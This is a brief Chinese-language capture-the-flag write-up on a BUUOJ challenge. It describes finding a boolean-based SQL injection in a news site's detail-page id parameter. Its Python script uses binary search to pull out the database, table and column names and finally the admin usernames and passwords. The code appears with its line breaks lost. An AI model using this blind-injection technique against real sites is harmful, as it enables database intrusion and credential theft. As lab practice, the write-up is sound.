这道题不难但是我写篇记录一下因为是第一次遇到这种的
首先我们进入登录页面尝试注入,没有任何回显,我便以为是盲注,但是payload改变而回显没有改变
开始寻找
注入点,居然在这里面,我服了
开始尝试
成功
-1||1
-1||0
其实还是fuzz好一点,像我这种没本子的手测了老半天了
写脚本的时候我以为flag在表里面结果没有,最后想着还有个登录界面,然后换了个表来注入出用户名密码,登录就有flag
import requestsflag = ""
i = 0while True:i += 1low = 32high = 127while low < high:mid = (high + low) // 2# url = f"http://b7d7c92e-c958-422a-af15-4e4eab33c2e2.node5.buuoj.cn:81/backend/content_detail.php?id=-1||(if(ascii(substr((database()),{i},1))>{mid},1,0))"# url = f"http://b7d7c92e-c958-422a-af15-4e4eab33c2e2.node5.buuoj.cn:81/backend/content_detail.php?id=-1||(if(ascii(substr((SElect(group_concat(schema_name))from(information_schema.schemata)),{i},1))>{mid},1,0))"# information_schema, ctftraining, mysql, performance_schema, test, news# url = f"http://b7d7c92e-c958-422a-af15-4e4eab33c2e2.node5.buuoj.cn:81/backend/content_detail.php?id=-1||(if(ascii(substr((SElect(group_concat(table_name))from(information_schema.tables)where(table_schema='news')),{i},1))>{mid},1,0))"# admin,contents# url = f"http://b7d7c92e-c958-422a-af15-4e4eab33c2e2.node5.buuoj.cn:81/backend/content_detail.php?id=-1||(if(ascii(substr((SElect(group_concat(column_name))from(information_schema.columns)where(table_name='admin')),{i},1))>{mid},1,0))"url = f"http://b7d7c92e-c958-422a-af15-4e4eab33c2e2.node5.buuoj.cn:81/backend/content_detail.php?id=-1||(if(ascii(substr((SELECt(group_concat(username,password))from(news.admin)),{i},1))>{mid},1,0))"r = requests.get(url=url)if 'title' in r.text:low = mid + 1else:high = midif low != 32:flag += chr(low)else:breakprint(flag)
